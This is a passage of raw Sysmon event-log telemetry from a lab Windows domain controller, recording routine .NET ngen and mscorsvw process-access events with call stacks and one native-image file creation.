13:46:15.922{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9127-6005-B901-00000000A301}4428C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005957Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:15.906{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9127-6005-B901-00000000A301}4428C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005956Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:15.906{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9127-6005-B901-00000000A301}4428C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005955Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:15.859{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9127-6005-B801-00000000A301}4076C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005954Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:15.843{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9127-6005-B801-00000000A301}4076C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005953Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:15.843{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9127-6005-B801-00000000A301}4076C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005952Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:15.625{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9127-6005-B701-00000000A301}2752C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005951Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:15.625{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9127-6005-B701-00000000A301}2752C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005950Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:15.625{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9127-6005-B701-00000000A301}2752C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005949Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:15.578{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9127-6005-B601-00000000A301}3732C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005948Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:15.562{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9127-6005-B601-00000000A301}3732C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005947Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:15.562{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9127-6005-B601-00000000A301}3732C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005946Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:46:15.468{59A5CD1D-9126-6005-B501-00000000A301}1128C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\468-0\Microsoft.CSharp.dll2021-01-18 13:46:15.468 10341000x80000000000000005964Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:16.406{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9128-6005-BB01-00000000A301}3260C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005963Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:16.390{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9128-6005-BB01-00000000A301}3260C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005962Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:16.390{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9128-6005-BB01-00000000A301}3260C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005961Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:16.328{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9128-6005-BA01-00000000A301}1068C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005960Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:16.312{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9128-6005-BA01-00000000A301}1068C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005959Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:16.312{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9128-6005-BA01-00000000A301}1068C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005983Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:17.968{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9129-6005-C101-00000000A301}4780C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005982Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:17.968{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9129-6005-C101-00000000A301}4780C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005981Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:17.968{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9129-6005-C101-00000000A301}4780C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005980Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:17.922{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9129-6005-C001-00000000A301}4540C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005979Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:17.906{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9129-6005-C001-00000000A301}4540C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005978Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:17.906{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9129-6005-C001-00000000A301}4540C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.ex